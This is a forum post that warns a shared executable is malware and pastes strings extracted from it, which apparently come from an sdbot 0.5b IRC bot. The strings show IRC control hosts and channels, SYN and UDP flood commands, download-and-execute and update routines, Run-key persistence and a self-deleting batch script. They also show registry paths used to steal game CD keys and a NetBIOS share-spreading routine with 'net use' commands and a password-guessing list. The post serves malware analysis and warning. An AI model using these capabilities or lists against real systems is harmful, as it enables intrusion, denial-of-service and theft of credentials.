Shoutbox

Hey all,
I have looked at the exe, and what it seems to do is look for the serial of a few games, and connect to irc. Moderators/Admins i suggest you delete this topic
Take a look at the code i extracted from the exe below:

code:

---

ScanNetBIOS GetLocalIP  GetCmdIP    GetNextIP   GetRandIP                                                           

                                                                                                                   

                                                                                                                   

                                                                                                                   

                                                                                                                   

EnumShare   TermProcess hack3r wingiz      ddos.no-ip.info    #s0t lol irc.gamesnet.net    #s0t   
       

wupdated.exe   
   
   Configuration Loaded .*        .                                                            

                                                                                                                   

                                                                                                                   

                 WinMain checksum    LookupAddress                                                               

SendSyn SYNFlood    decryptstr  addlog  addalias    addthread   irc_connect ident   rndnick irc_receiveloop

irc_parseline   irc_spyparseline    irc_send    irc_sendf   irc_sendf2  irc_privmsg replacestr  udp ping   

webdownload redirect    redirectloop    redirectloop2   netinfo sysinfo cpuspeed    cyclecount  visit   uninstall   

synthread   Done with SYN flood [%iKB/sec]
%%comspec%% /c %s %s @echo off
tart
if not exist ""%1"" goto done
del /F ""%1""
del ""%1""
goto start
one
del /F %temp%
.bat
del %temp%
.bat
%s\r.bat url visited. invalid URL. error visiting URL. */*         
                     !       &       2       7

      B       G       K       P       d       @B     cpu: %dMHz. ram: %dMB total, %dMB free. os: Windows %s (%d.%d,

build %d). uptime: %dd %dh %dm. box: %s. user: %s. %s [%s] ??? XP 2000 ME 98 NT 95 connection type: %s (%s). local

IP address: %d.%d.%d.%d. connected from: %s N/A LAN dial-up bad url, or dns error. update failed: error executing

file. downloaded %.1f kb to %s @ %.1f kb/sec. updating... PRIVMSG %s pened %s.
            �@downloaded %.1f kb to %s @ %.1f kb/sec. update (%s - %dkb transferred) file download (%s - %dkb

transferred) PRIVMSG %s :couldn't open %s.
PRIVMSG %s :finished sending pings to %s.
PRIVMSG %s :error sending pings to %s.
PRIVMSG %s :finished sending packets to %s.
PRIVMSG %s :error sending packets to %s.
%s%s %s%s%s %s %s :%s
%s
[%s]: <%s> %s
[%s]: * %s %s ACTION
ACTION [%s]: %s sets mode: %s MODE [%s]: %s is now known as %s. [%s]: %s has

quit(%s). wtf %s?
[%s]: %s has left %s. [%s]: %s has joined %s. JOIN [%s]: nick %s already in use. 433 [%s]: Users in %s: %s spy

created on %s:%d, in channel %s.
spy (%s) sp spy icmp.dll not available sending %d pings to %s. packet size: %d, timeout: %d[ms]
ping (%s) p ping sending %d udp packets to: %s. packet size: %d, delay: %d[ms].
udp (%s) u udp [%s] * %s %s c_a c_action [%s] <%s> %s c_pm c_privmsg redirect created on port %d to %s:%d.
redirect (%d->%s:%d) rd redirect downloading %s...
download (%s) dl download clone created on %s:%d, in channel %s.
clone (%s) c clone SYN flooding [%s:%s] for %s seconds
syn couldn't execute file. e execute downloading update from %s...
update (%s) %s\%s.exe up update de delay PART %s c_p c_part JOIN %s %s c_j c_join c_n c_nick MODE %s c_m c_mode

c_r c_raw %s %s %s :%s rp repeat MODE %s
m mode cy cycle
ACTION %s
a action pm privmsg aa addalias v visit couldn't resolve host %s -> %s dn dns se

couldn't open file. file opened. o open pr prefix NICK %s c_rn c_rndnick c_q c_quit thread(s) killed. k killthread

raw PART %s
pt part j join n nick removing bot... rm remove si sysinfo ni netinfo lg log %d. %s = %s -[alias list]- al aliases

%d. %s -[thread list]- t threads sdbot 0.5b with SYN flood by [sd] ab about i id sdbot 0.5b with SYN flood ready.

Up %dd %dh %dm. s status QUIT :%s
QUIT :later
q quit QUIT :later disconnect QUIT :reconnecting reconnect user %s logged out.
lo logout d die Found Tiberian Sun CDKey (%s).
Software\Westwood\Tiberian Sun Found Red Alert 2 CDKey (%s).
Serial Software\Westwood\Red Alert 2 Software\IGI 2 Retail\CDKey Found Command & Conquer Generals CDKey (%s).
Software\Electronic Arts\EA GAMES\Generals\ergc Found FIFA 2003 CDKey (%s).
Software\Electronic Arts\EA Sports\FIFA 2003\ergc Found NFSHP2 CDKey (%s).
Software\Electronic Arts\EA GAMES\Need For Speed Hot Pursuit 2\ergc Found The Gladiators CDKey (%s).
RegNumber Software\Eugen Systems\The Gladiators Found SOF2 CDKey (%s).
mtkwftmkemfew3p3b7 sof2key %s\base\mp\%s InstallPath Software\Activision\Soldier of Fortune II - Double Helix

Found NWN CDKey %s.
= Key1= r nwncdkey.ini %s\%s Location Software\BioWare\NWN\Neverwinter Rainbow Six III RavenShield CDKey (%s).
SOFTWARE\Red Storm Entertainment\RAVENSHIELD Found Battlefield 1942 Road To Rome CDKey (%s).
SOFTWARE\Electronic Arts\EA GAMES\Battlefield 1942 The Road to Rome Found Battlefield 1942 CDKey (%s).
ergc SOFTWARE\Electronic Arts\EA GAMES\Battlefield 1942 Found Project IGI 2 CDKey (%s).
SOFTWARE\IGI 2 Retail Found Counter-Strike ( Retail ) CDKey (%s).
Software\Valve\CounterStrike\Settings Found Unreal Tournament 2003 CDKey (%s).
CDKey Software\Unreal Technology\Installed Apps\UT2003 Found Half-Life CDKey (%s).
Key Software\Valve\Half-Life\Settings cdkey getcdkey NICK %s
rn rndnick 63 ) $chr( $server $rndnick $chan $user $me $%d $%d- user %s(%s) logged in.   password accepted. l

login NOTICE %s :
PING %s


PING NOTICE %s :
VERSION %s


VERSION
# 332 PRIVMSG joined channel %s. 353 QUIT PART NICK screw you %s! NOTICE %s :%s
user %s logged out. KICK @ 302 USERHOST %s
005 001 pong NOTICE JOIN %s %s
PONG %s
jamesbrown WHOIS %s
PING ! -s    :

NICK %s
USER %s 0 0 :%s
PASS %s
%d, %d : USERID : UNIX : %s
connected to %s. [%d-%d-%d %d:%d:%d] %s syn flood: %s:%s [%iKB/sec] send error!:%d
Error: Cannot initalize

winsock. bot started. raw PRIVMSG $1 chr(1)$2-$chr(1) ctcp syn $1 80 60 s1 ping $1 10000 $2 50 p2 udp $1 10000

2048 50 u1 action $chan smacks $1 smack mode $chan +o $user opme main thread

Software\Microsoft\Windows\CurrentVersion\RunServices Software\Microsoft\Windows\CurrentVersion\Run \%s

InternetGetConnectedStateEx InternetGetConnectedState WININET.DLL Mozilla/4.0 (compatible) Process32Next Process32

First CreateToolhelp32Snapshot RegisterServiceProcess kernel32.dll IcmpSendEcho IcmpCloseHandle IcmpCreateFile

ICMP.DLL C:\ %S \IPC$ . %s net use * "%s" "%s" /user:"%s"
net use * "%s" "%s" /user:""
net use * "%s" "" /user:""
\

\\ [SCANNING] Address: %s    Port: 139
!@#$%^&* !@#$%^& !@#$%^ !@#$% !@#$ 654321 123456 1234 123 111 1 server

secret password password123 pass pass123 hidden asdfgh asdf  wwwadmin user system sqlagent sql root owner guest

database administrator admin  wedit.exe -p %d  lcc runtime: GP fault.       Stack trace     Current instruction: 0

x%x
Fault occurred outside a function scope

     ...
Corrupted stack. Impossible to show trace
unknown
%3d %s [%s]

%s %s %d
  %d after unknown line       

---